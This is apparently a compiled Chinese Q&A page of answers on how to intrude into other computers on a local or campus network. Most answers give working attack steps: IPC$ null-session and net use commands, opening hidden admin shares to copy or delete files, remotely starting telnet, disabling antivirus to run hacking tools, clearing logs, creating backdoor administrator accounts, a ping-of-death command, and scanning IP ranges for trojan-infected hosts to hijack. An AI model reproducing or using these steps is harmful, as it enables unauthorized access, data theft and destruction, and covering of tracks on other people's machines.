Ⅰ 請教如何侵入區域網內的一台計算機
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:"-w數字"用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:"-l[空格]數據包大小";"-n發送數據次數";"-t"指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如"DEL/AR *.*"表示刪除當前目錄下所有隻讀文件,"DEL/A-S *.*"表示刪除當前目錄下除系統文件以外的所有文件
1.入侵的范圍只包括區域網,如果在學校上,可以入侵整個校園網;
2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空),並且開了139埠,但沒開防火牆的機子。
入侵工具:
一般要用到三個:NTscan變態掃描器,Recton--D賀免殺專用版,DameWare迷你中文版 4.5. (前兩個工具殺毒軟體都會報毒,建議將殺毒軟體實時防毒暫時關掉,並將這兩個軟體的壓縮包加密,防止被殺。)
入侵步驟:
1.使用"NTscan變態掃描器",在IP處填上要掃描的IP范圍,選擇"WMI掃描"方式,按"開始"後就等掃描結果了。
2.使用"Recton--D賀免殺專用版"
選擇"CMD命令"項,在"CMD:"中輸入"net share C$=C:\",即可開啟遠程主機的C盤共享,以此將"C"換成D,E,F等,即可開啟D盤,E盤,F盤等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對方主機上不會出現一隻手托住盤的共享標志,然後在地址欄中輸入"\\對方IP\C$",即可進入對方C盤。
選擇"Telnet"項,在"遠程主機"中輸入剛才掃描到的一個IP,遠程啟動Telnet服務,成功後在"CMD選項"中,執行命令:"net share ipc$",接著執行:"net share admin$",最後執行"net use \\***.***.***.***\IPC$ "" /user:administrator"在*處填入你入侵的主機IP。
3.使用"DameWare迷你中文版 4.5",安裝後點"DameWare Mini Remote Control",在"幫助"項中選擇激活產品,輸入注冊信息,成功注冊後,進入"遠程連接"窗口,在"主機"處填入IP地址,點"設置",在"服務安裝選項"中點"編輯"後,在"通知對話框"中去掉"連接時通知",在"附加設置"中全都不選,在"用戶選項"中去掉"啟用用戶選項菜單"。設置完成好後,就可點"連接",在彈出的對話框中點"確定"後,成功後你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監視對方屏幕。 注意:如果不注冊的話,在對方主機上會彈出一個對話框,暴露你的身份。
入侵步驟補充:
1.在以上第2步中,遠程啟動Telnet服務可以通過"我的電腦-管理-連接到另一台計算機-輸入IP-服務和應用程序-服務-將telnet改為手動-啟動"完成。
2.Recton--D賀免殺專用版還有其他功能,在"進程"項中,可以查看遠程主機的進程,並可任意結束其中進程;在"共享"項中,可以創建共享,我常用的是創建C$,D$,E$,F$,共享路徑分別對應C:\,D:\等,共享好後在地址欄中輸入"\\IP\C$",進入對方C盤,你就可以隨意復制刪除裡面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標,也就不會被發現,弄完後最好還是把共享給關掉。最後選"日誌",清除所有日誌,不留痕跡。這個軟體會被殺毒軟體當作病毒殺掉,用它時須將實時防毒關掉。
3.上面的共享可通過CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,鍵入y後輸入的用戶名"administrator",密碼為空, 進入後,開共享用net share命令,共享C$(即C盤):"net share C$=C:",共享system文件夾:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最後是關閉共享,關閉C盤共享:"net share C$ /del"。
4.為方便下次入侵,可以設置後門, 查看用戶:"net user",激活guest用戶
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的許可權提升為管理員許可權:"net localgroup administrators guest /add"。
5.telnet命令(DOS命令)很多,可去網上查找它的命令,常用的有:查看D盤文件:""dir d:\",查看C盤program file文件夾:"dir c:\PROGRA~1\;",60秒倒記時關機:"shutdown -s -t 60"
補充說明:
1.net use錯誤原因解決:
(1)."發生系統錯誤 1326。 登錄失敗: 未知的用戶名或錯誤密碼。"
在遠程機的"控制面板-文件夾選項-查看-簡單的文件共享",去掉選取,然後再嘗試連接。簡單文件共享會把網路連接許可權都歸為 guest連接,是無法訪問C$等管理共享的.
(2)"發生系統錯誤 1327。 登陸失敗:用戶帳戶限制。可能的原因包括不允許空密碼,登陸時間限制,或強制的策略限。"在遠程機的"控制面板-管理工具-本地安全策略-安全選項-用戶許可權"指派里,禁用"空密碼用戶只能進行控制台登陸".
(3)"//IP/c$"時提示找不到網路途徑。在"網路和撥號連接"中"本地連接"中選取"Internet協議(TCP/IP)"屬性,進入"高級TCP/IP設置"選"WINS設置"裡面有一項"啟用TCP/IP的NETBIOS
Ⅱ 怎麼入侵在同一區域網的電腦
入侵區域網電腦的方法方法一:;
1.取得對方IP地址如XX.XX.XX.XX,方;
2.判斷對方上網的地點,開個DOS窗口鍵入TRA;
3.得到對方電腦的名稱,開個DOS窗口鍵入NBT;第一行是對方電腦名稱第二行是對方電腦所在工作組第;
4.在Windows目錄下有一文件名為LMHOS;
5.開DOS窗口鍵入NBTSTAT-R6.在開始
Ⅲ 怎麼入侵區域網內的電腦
不太容易..
最好有一台在內網里的肉雞
然後,網上就有大把的軟體了...
最好不要這樣,不厚道啊...
Ⅳ 如何入侵區域網中的鄰居家電腦
親,如今的殺毒軟體都不是吃干飯的,你能用軟體抓他上網時候流出來的包已經相當不錯了
Ⅳ 怎麼入侵區域網的電腦
教你一個CMD入侵 IPC$入侵
利用ipc$入侵的相關命令:
我們在入侵的時候難免遇到忘記命令的時候,現在將我所知道的一些命令總結出來提供給各位。通過這些命令可以解決很大一部分新手的問題。
00:net use
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
參數介紹:
(1)鍵入不帶參數的net use列出網路連接。
(2)devicename指定要連接到的資源名稱或要斷開的設備名稱。
(3)\\\\computername\\sharename伺服器及共享資源的名稱。
(4)password訪問共享資源的密碼。
(5)*提示鍵入密碼。
(6)/user指定進行連接的另外一個用戶。
(7)domainname指定另一個域。
(8)username指定登錄的用戶名。
(9)/home將用戶連接到其宿主目錄。
(10)/delete取消指定網路連接。
(11)/persistent控制永久網路連接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空連接
02: net use \\\\X.X.X.X\\ipc$ \"密碼\" /user:\"用戶名\" 建立非空連接
03: net use \\\\X.X.X.X\\ipc$ /del 刪除連接
04: net time \\\\X.X.X.X
作用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time [\\\\computername | /domain[:name]] [/set]
參數介紹:
(1)\\\\computername要檢查或同步的伺服器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鍾與指定計算機或域的時鍾同步。
05: net view \\\\X.X.X.X
作用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\\\computername | /domain[:domainname]]
參數介紹:
(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
06: net use X: \\\\X.X.X.X\\Y 將共享名為Y的共享資源映射為本地X盤
07: net use X: /del 刪除映射的X盤
08: net share
作用:創建、刪除或顯示共享資源。
命令格式:net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"]
參數介紹:(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。 (2)sharename是共享資源的網路名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:\"text \"添加關於資源的注釋,注釋文字用引號引住。
09: net user
作用:添加或更改用戶帳號或顯示用戶帳號信息。
該命令也可以寫為 net users
命令格式:net user [username [password | *] [options]] [/domain]
參數介紹:(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
10: net start 作用:啟動服務,或顯示已啟動服務的列表。
11: net pause 作用:暫停正在運行的服務。
12: net Continue 作用:重新激活掛起的服務。
13: net stop
還可以利用工具,如ATOOL,流光。。。
可以和我交流哦
Ⅵ 如何入侵區域網電腦經典重現看菜鳥如何入侵內網
區域網的電腦入侵其實是比較容易的,比如 。看下他有沒關掉隱藏的共享盤,可以通過net share查看本機的是否關。net share +要入侵的電腦名或IP可以看別的電腦是否關。如果沒有關可以匿名登錄他電腦上傳一個木馬,這樣通過木馬就可以控制別人的電腦了,或者通過QQ給他傳一個捆綁了的木馬讓他運行。總之。要想控制他人的電腦的話就是用遠程式控制制軟體讓他運行服務端我們運行客戶端從而控制他人的電腦
Ⅶ 如何入侵同一區域網內的電腦
方法一: 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。 2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。 3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第一行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明 4.在Windows目錄下有一文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名 5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。 方法二: 第一步 下載必備的工具軟體。1號軟體就是埠掃描工具「網路刺客II」,2號軟體就是著名的國產木馬冰河2.2的控制端。 下載完畢並解壓縮之後跟我進行第二步! 第二步 運行1號軟體,首先出現的是「網路刺客II注冊向導」,別理它,點擊「稍後(Q)」就進入了網路刺客II的主界面。 第三步 在網路刺客II的主界面里選「工具箱(U)」-》「主機查找器(H)」,就進入了「搜索網際網路主機」界面。 第四步 進入「搜索網際網路主機」界面後,「起始地址」欄填XXX.XXX.0.0其中XXX.XXX自己去選擇了,比如你可以選61.128或選61.200等等,「結束地址」欄填XXX.XXX.255.255其中XXX.XXX的選擇要和前面一樣。「埠」欄填7626,其他欄保持默認不動。 好了,以上設置就是要搜索從XXX.XXX.0.0到XXX.XXX.255.255這一段IP地址中有冰河木馬的計算機了,再檢查一下填對沒有?如果一切OK,請點擊「開始搜索」。 第五步 觀察「總進度」和「段進度」是否在走動。如果沒有走動,那一定是IP地址設置不對,請認真檢查。如果兩個進度都在走動,呵呵,你就成功一半了,至少你會使用網路刺客II掃描網上開放某一埠的計算機了。 下面你要作的就是靜靜的等待,學用黑客軟體是需要耐心的。大約20-30分鍾後,最下面的記錄欄里就應該出現記錄了(一般情況下,應該有5、6條記錄)。每一條記錄代表找到的中了冰河木馬的一台計算機,前面是該計算機的IP地址,後面是7626(冰河木馬埠)。 第六步 點擊「停止搜索」,但不要退出程序,到第十二步時還要用。運行2號軟體冰河,進入冰河主界面。選「文件」-》「添加主機」進入添加主機窗口。 第七步 在「添加主機」窗口,「顯示名稱」里填入第五步里搜索到的第一條IP地址,當IP地址填入「顯示名稱」里後,「主機地址」里就自動填入相同的IP了。「訪問口令」不填,「監聽埠」保持默認的7626。 好了,檢查一下IP有沒有填錯,如果OK,點擊「確定」,在冰河主界面的「文件管理器」里就出現了剛才填入的IP地址了。第八步 這一步和下一步最重要,請認真看清楚!在冰河的主界面里,點擊「文件管理器」里的「我的電腦」,這時「文件管理器」右邊的框里就會出現你自己的硬碟分區。比如,如果你的硬碟分的是四個區,「文件管理器」右邊的框里就會從上往下依次出現C:、D:、E:、F:,如果你的硬碟分的是兩個區,就會出現C:、D:。 第九步 點擊「文件管理器」里剛才輸入的第一條IP地址,稍等片刻(網速慢的情況下約10-30秒),在「文件管理器」右邊的框里就會出現對方計算機的硬碟分區了。看到了嗎?看到了?呵呵,祝賀你,你已經成功地進入對方的計算機了 第十步 你發現沒有出現對方計算機的硬碟分區!!呵呵,別急,看看冰河主界面最下端的狀態欄里有什麼提示,如果是下面兩種情況,就放棄,返回第七步,填入搜索到的第二條IP地址: 1、狀態欄里出現「口令不對」、「口令錯誤」、「密碼不對」、「密碼錯誤」等之類的提示,表示該計算機的冰河木馬是加了密碼的,沒有辦法,只得放棄! 2、狀態欄里出現「正在解釋命令,可能是1.2以前版本」等之類的提示,也放棄,新手是搞不定的,如果以後你熟練了可以給對方升級,這是後話!! 第十一步 如果出現的是「主機沒有響應」、「無法與主機建立連接」之類的提示,先別忙放棄,重復3-4遍第八步到第九步的操作,即點擊「我的電腦」-》點擊輸入的IP地址,如此反復3-4遍後,還是不行的話再放棄,返回第七步,填入搜索到的下一條IP地址。 第十二步 如果所有搜索到的IP地址按照第七步至第十一步操作後都不能進入對方計算機,呵呵,那是你的運氣太差!別急,這樣的運氣是經常碰到的!再返回第五步,在「搜索網際網路主機」界面里點擊「開始搜索」,這時該程序又從你停止的IP地址接著往下搜索了!!呵呵,等吧!!搜索吧!!只要你有時間,你一定能成功! 第十三步 終於成功了!我見到對方計算機硬碟分區了!呵呵,怎麼樣?你成功了,我的任務就完成了。進入對方計算機後,所有的操作和自己計算機「文件管理器」里的操作一模一樣!就沒什麼黑不到過來的了!
Ⅷ 如何入侵同一個區域網內的電腦
首先你要知道跟你同一個區域網的用戶是否開啟了防火牆或者禁止了同一區域網的共享和安全!如果對方禁用了共享,那你是進不去的,只有用歪門邪道進去了方法如下
一、 在該機創建一個批處理文件,內容如下:
net user admin /add
net localgroup administrators admin /add
將上述的批處理文件保存為 admin.bat.
註:上述批處理文件作用是創建一個名為 admin 的管理員帳戶(密碼為空)。
二、將此批處理文件作為Windows 的開機啟動腳本。
1、在 運行 對話框中輸入 gpedit.msc
2、定位到 計算機配置一>Windows設置一>腳本 (啟動/關機), 雙擊右邊窗口的 啟動,在其中添加先前創建的 admin.bat。
3、重新啟動計算機(兩次),系統便有了一個名為admin 的管理員
上述操作在Windows 2000/XP中可行,但要保證帳戶可以訪問注冊表,組策略(創建帳戶的操作實際上也就是在注冊表中添加相應的項和值),而Windows中的預設的Guest/受限帳戶並無此限制。
或許,我們並不需要用Guest帳戶去創建一個管理員,但設想如果某個程序只有管理員可執行,是否也就可用上述的方法來實現呢?
小結:Windows系統默認對Guest/受限帳戶的限制只是表面上的,作為一個有經驗的系統管理員,要做的事情還很多,起碼應該禁止受限用戶訪問/修改注冊表,組策略等。
謝謝!
Ⅸ 如何入侵區域網電腦
去買《黑客X檔案》裡面很多入侵教程